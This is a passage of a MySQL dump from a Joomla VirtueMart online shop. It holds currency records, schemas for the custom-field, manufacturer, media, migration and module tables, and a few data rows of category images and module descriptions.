00:00:00',0,'0000-00-00 00:00:00',0),(149,1,'Samoan tala','','WST',882,0.00000,'T','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(151,1,'Yemeni rial','','YER',886,0.00000,'﷼','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(152,1,'Serbian dinar','','RSD',941,0.00000,'Дин.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(153,1,'South African rand','','ZAR',710,0.00000,'R','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(154,1,'Zambian kwacha','','ZMK',894,0.00000,'ZK','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(156,1,'Zimbabwean dollar','','ZWD',932,0.00000,'Z$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(158,1,'Armenian dram','','AMD',51,0.00000,'դր.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(159,1,'Myanmar kyat','','MMK',104,0.00000,'K','2',',','','{number} {symbol}','{symbol} {sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(160,1,'Croatian kuna','','HRK',191,0.00000,'kn','2',',','.','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(161,1,'Eritrean nakfa','','ERN',232,0.00000,'Nfk','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(162,1,'Djiboutian franc','','DJF',262,0.00000,'Fr','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(163,1,'Icelandic króna','','ISK',352,0.00000,'kr','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(164,1,'Kazakhstani tenge','','KZT',398,0.00000,'лв','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(165,1,'Kyrgyzstani som','','KGS',417,0.00000,'лв','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(166,1,'Latvian lats','','LVL',428,0.00000,'Ls','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(167,1,'Lithuanian litas','','LTL',440,0.00000,'Lt','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(168,1,'Mexican peso','','MXN',484,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(169,1,'Moldovan leu','','MDL',498,0.00000,'L','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(170,1,'Namibian dollar','','NAD',516,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(171,1,'Nicaraguan córdoba','','NIO',558,0.00000,'C$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(172,1,'Ugandan shilling','','UGX',800,0.00000,'Sh','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(173,1,'Macedonian denar','','MKD',807,0.00000,'ден','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(174,1,'Uruguayan peso','','UYU',858,0.00000,'$','0','','','{symbol}number}','{symbol}{sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(175,1,'Uzbekistani som','','UZS',860,0.00000,'лв','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(176,1,'Azerbaijani manat','','AZN',934,0.00000,'ман','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(177,1,'Ghanaian cedi','','GHS',936,0.00000,'₵','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(178,1,'Venezuelan bolívar','','VEF',937,0.00000,'Bs','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(179,1,'Sudanese pound','','SDG',938,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(180,1,'Uruguay Peso','','UYI',940,0.00000,'UYI','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(181,1,'Mozambican metical','','MZN',943,0.00000,'MT','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(182,1,'WIR Euro','','CHE',947,0.00000,'€','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(183,1,'WIR Franc','','CHW',948,0.00000,'CHW','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(184,1,'Central African CFA franc','','XAF',950,0.00000,'Fr','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(185,1,'East Caribbean dollar','','XCD',951,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(186,1,'West African CFA franc','','XOF',952,0.00000,'Fr','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(187,1,'CFP franc','','XPF',953,0.00000,'Fr','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(188,1,'Surinamese dollar','','SRD',968,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(189,1,'Malagasy ariary','','MGA',969,0.00000,'MGA','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(190,1,'Unidad de Valor Real','','COU',970,0.00000,'COU','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(191,1,'Afghan afghani','','AFN',971,0.00000,'؋','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(192,1,'Tajikistani somoni','','TJS',972,0.00000,'ЅМ','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(193,1,'Angolan kwanza','','AOA',973,0.00000,'Kz','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(194,1,'Belarusian ruble','','BYR',974,0.00000,'p.','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(195,1,'Bulgarian lev','','BGN',975,0.00000,'лв','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(196,1,'Congolese franc','','CDF',976,0.00000,'Fr','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(197,1,'Bosnia and Herzegovina convert','','BAM',977,0.00000,'KM','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(198,1,'Mexican Unid','','MXV',979,0.00000,'MXV','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(199,1,'Ukrainian hryvnia','','UAH',980,0.00000,'₴','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(200,1,'Georgian lari','','GEL',981,0.00000,'ლ','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(201,1,'Mvdol','','BOV',984,0.00000,'BOV','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_currencies` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_customs`
--

DROP TABLE IF EXISTS `myaou_virtuemart_customs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_customs` (
  `virtuemart_custom_id` int unsigned NOT NULL AUTO_INCREMENT,
  `custom_parent_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_vendor_id` smallint NOT NULL DEFAULT '1',
  `custom_jplugin_id` int NOT NULL DEFAULT '0',
  `custom_element` char(50) NOT NULL DEFAULT '',
  `admin_only` tinyint(1) NOT NULL DEFAULT '0' COMMENT '1:Display in admin only',
  `custom_title` char(255) NOT NULL DEFAULT '' COMMENT 'field title',
  `show_title` tinyint(1) NOT NULL DEFAULT '1',
  `custom_tip` char(255) NOT NULL DEFAULT '' COMMENT 'tip',
  `custom_value` varchar(20000) DEFAULT NULL COMMENT 'default value',
  `custom_desc` char(255) DEFAULT NULL COMMENT 'description or unit',
  `field_type` char(2) NOT NULL DEFAULT '0' COMMENT 'S:string,I:int,P:parent, B:bool,D:date,T:time,H:hidden',
  `is_list` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'list of values',
  `is_hidden` tinyint(1) NOT NULL DEFAULT '0' COMMENT '1:hidden',
  `is_cart_attribute` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Add attributes to cart',
  `is_input` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Add input to cart',
  `layout_pos` char(24) DEFAULT NULL COMMENT 'Layout Position',
  `custom_params` text,
  `shared` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'valid for all vendors?',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_custom_id`),
  KEY `i_custom_parent_id` (`custom_parent_id`),
  KEY `i_virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `idx_custom_element` (`custom_element`),
  KEY `idx_field_type` (`field_type`),
  KEY `i_is_cart_attribute` (`is_cart_attribute`),
  KEY `i_is_input` (`is_input`),
  KEY `i_shared` (`shared`),
  KEY `i_published` (`published`),
  KEY `i_ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COMMENT='custom fields definition';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_customs`
--

LOCK TABLES `myaou_virtuemart_customs` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_customs` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_customs` VALUES (1,0,1,0,'',0,'COM_VIRTUEMART_RELATED_PRODUCTS',1,'COM_VIRTUEMART_RELATED_PRODUCTS_TIP','related_products','COM_VIRTUEMART_RELATED_PRODUCTS_DESC','R',0,0,0,0,NULL,NULL,0,1,'2011-05-25 21:52:43',62,0,'2011-05-25 21:52:43',62,'0000-00-00 00:00:00',0),(2,0,1,0,'',0,'COM_VIRTUEMART_RELATED_CATEGORIES',1,'COM_VIRTUEMART_RELATED_CATEGORIES_TIP','related_categories','COM_VIRTUEMART_RELATED_CATEGORIES_DESC','Z',0,0,0,0,NULL,NULL,0,1,'0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_customs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_manufacturer_medias`
--

DROP TABLE IF EXISTS `myaou_virtuemart_manufacturer_medias`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_manufacturer_medias` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_manufacturer_id` smallint unsigned NOT NULL DEFAULT '0',
  `virtuemart_media_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_manufacturer_id` (`virtuemart_manufacturer_id`,`virtuemart_media_id`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_manufacturer_medias`
--

LOCK TABLES `myaou_virtuemart_manufacturer_medias` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturer_medias` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturer_medias` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_manufacturercategories`
--

DROP TABLE IF EXISTS `myaou_virtuemart_manufacturercategories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_manufacturercategories` (
  `virtuemart_manufacturercategories_id` int unsigned NOT NULL AUTO_INCREMENT,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_manufacturercategories_id`),
  KEY `published` (`published`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Manufacturers are assigned to these categories';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_manufacturercategories`
--

LOCK TABLES `myaou_virtuemart_manufacturercategories` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturercategories` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturercategories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_manufacturercategories_en_gb`
--

DROP TABLE IF EXISTS `myaou_virtuemart_manufacturercategories_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_manufacturercategories_en_gb` (
  `virtuemart_manufacturercategories_id` int unsigned NOT NULL,
  `mf_category_name` char(180) NOT NULL DEFAULT '',
  `mf_category_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_manufacturercategories_en_gb`
--

LOCK TABLES `myaou_virtuemart_manufacturercategories_en_gb` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturercategories_en_gb` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturercategories_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_manufacturercategories_tr_tr`
--

DROP TABLE IF EXISTS `myaou_virtuemart_manufacturercategories_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_manufacturercategories_tr_tr` (
  `virtuemart_manufacturercategories_id` int unsigned NOT NULL,
  `mf_category_name` char(180) NOT NULL DEFAULT '',
  `mf_category_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_manufacturercategories_tr_tr`
--

LOCK TABLES `myaou_virtuemart_manufacturercategories_tr_tr` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturercategories_tr_tr` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturercategories_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_manufacturers`
--

DROP TABLE IF EXISTS `myaou_virtuemart_manufacturers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_manufacturers` (
  `virtuemart_manufacturer_id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_manufacturercategories_id` int DEFAULT NULL,
  `hits` int unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_manufacturer_id`),
  KEY `published` (`published`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Manufacturers are those who deliver products';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_manufacturers`
--

LOCK TABLES `myaou_virtuemart_manufacturers` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturers` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_manufacturers_en_gb`
--

DROP TABLE IF EXISTS `myaou_virtuemart_manufacturers_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_manufacturers_en_gb` (
  `virtuemart_manufacturer_id` int unsigned NOT NULL,
  `mf_name` char(180) NOT NULL DEFAULT '',
  `mf_email` char(255) NOT NULL DEFAULT '',
  `mf_desc` varchar(19000) NOT NULL DEFAULT '',
  `mf_url` char(255) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_manufacturers_en_gb`
--

LOCK TABLES `myaou_virtuemart_manufacturers_en_gb` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturers_en_gb` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturers_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_manufacturers_tr_tr`
--

DROP TABLE IF EXISTS `myaou_virtuemart_manufacturers_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_manufacturers_tr_tr` (
  `virtuemart_manufacturer_id` int unsigned NOT NULL,
  `mf_name` char(180) NOT NULL DEFAULT '',
  `mf_email` char(255) NOT NULL DEFAULT '',
  `mf_desc` varchar(19000) NOT NULL DEFAULT '',
  `mf_url` char(255) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_manufacturers_tr_tr`
--

LOCK TABLES `myaou_virtuemart_manufacturers_tr_tr` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturers_tr_tr` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_manufacturers_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_medias`
--

DROP TABLE IF EXISTS `myaou_virtuemart_medias`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_medias` (
  `virtuemart_media_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint NOT NULL DEFAULT '1',
  `file_title` char(126) NOT NULL DEFAULT '',
  `file_description` char(254) NOT NULL DEFAULT '',
  `file_meta` char(254) NOT NULL DEFAULT '',
  `file_mimetype` char(64) NOT NULL DEFAULT '',
  `file_type` char(32) NOT NULL DEFAULT '',
  `file_url` varchar(900) NOT NULL DEFAULT '',
  `file_url_thumb` varchar(900) NOT NULL DEFAULT '',
  `file_is_product_image` tinyint(1) NOT NULL DEFAULT '0',
  `file_is_downloadable` tinyint(1) NOT NULL DEFAULT '0',
  `file_is_forSale` tinyint(1) NOT NULL DEFAULT '0',
  `file_params` varchar(17500) DEFAULT NULL,
  `file_lang` varchar(500) NOT NULL,
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_media_id`),
  KEY `i_virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `i_published` (`published`),
  KEY `i_shared` (`shared`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb3 COMMENT='Additional Images and Files which are assigned to products';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_medias`
--

LOCK TABLES `myaou_virtuemart_medias` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_medias` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_medias` VALUES (1,1,'avk2-2.jpg','','','image/jpeg','category','images/stories/virtuemart/category/avk2-2.jpg','',0,0,0,'','',0,1,'2014-07-31 16:16:47',607,'2014-07-31 16:43:32',607,'0000-00-00 00:00:00',0),(2,1,'ls60v.gif','','','image/gif','category','images/stories/virtuemart/category/ls60v.gif','',0,0,0,'','',0,1,'2014-07-31 16:32:03',607,'2014-07-31 16:43:46',607,'0000-00-00 00:00:00',0),(3,1,'1226655430.jpg','','','image/jpeg','category','images/stories/virtuemart/category/1226655430.jpg','',0,0,0,'','',0,1,'2014-07-31 16:49:31',607,'2014-07-31 16:49:48',607,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_medias` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_migration_oldtonew_ids`
--

DROP TABLE IF EXISTS `myaou_virtuemart_migration_oldtonew_ids`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_migration_oldtonew_ids` (
  `id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `cats` longblob,
  `catsxref` blob,
  `manus` longblob,
  `mfcats` blob,
  `shoppergroups` longblob,
  `products` longblob,
  `products_start` int DEFAULT NULL,
  `orderstates` blob,
  `orders` longblob,
  `attributes` longblob,
  `relatedproducts` longblob,
  `orders_start` int DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='xref table for vm1 ids to vm2 ids';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_migration_oldtonew_ids`
--

LOCK TABLES `myaou_virtuemart_migration_oldtonew_ids` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_migration_oldtonew_ids` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_migration_oldtonew_ids` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_modules`
--

DROP TABLE IF EXISTS `myaou_virtuemart_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_modules` (
  `module_id` int unsigned NOT NULL AUTO_INCREMENT,
  `module_name` char(255) DEFAULT NULL,
  `module_description` varchar(21000) DEFAULT NULL,
  `module_perms` char(255) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `is_admin` enum('0','1') NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`module_id`),
  KEY `idx_module_name` (`module_name`),
  KEY `idx_module_ordering` (`ordering`),
  KEY `i_published` (`published`)
) ENGINE=MyISAM AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb3 COMMENT='VirtueMart Core Modules, not: Joomla modules';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_modules`
--

LOCK TABLES `myaou_virtuemart_modules` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_modules` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_modules` VALUES (1,'product','Here you can administer your online catalog of products.  Categories , Products (view=product), Attributes, Product Types, Product Files (view=media), Inventory, Calculation Rules, Customer Reviews  ','storeadmin,admin',1,'',1),(2,'order','View Order and Update Order Status:    Orders , Coupons , Revenue Report ,Shopper , Shopper Groups ','admin,storeadmin',1,'',2),(3,'manufacturer','Manage the manufacturers of products in your store.','storeadmin,admin',1,'',3),(4,'store','Store Configuration: Store Information, Payment Methods , Shipment, Shipment Rates','storeadmin,admin',1,'',4),(5,'configuration','Configuration: shop configuration , currencies (view=currency), Credit Card List, Countries, userfields, order status  ','admin,storeadmin',1,'0',5),(6,'msgs','This module is unprotected an used for displaying system messages to users.  We need to have an area that does not require authorization when things go wrong.','none',0,'',99),(7,'shop','This is the Washupito store module.  This is the demo store included with the VirtueMart distribution.','none',1,'',99),(8,'store','Store Configuration: Store Information, Payment Methods , Shipment, Shipment Rates','storeadmin,admin',1,'',4),(9,'account','This module 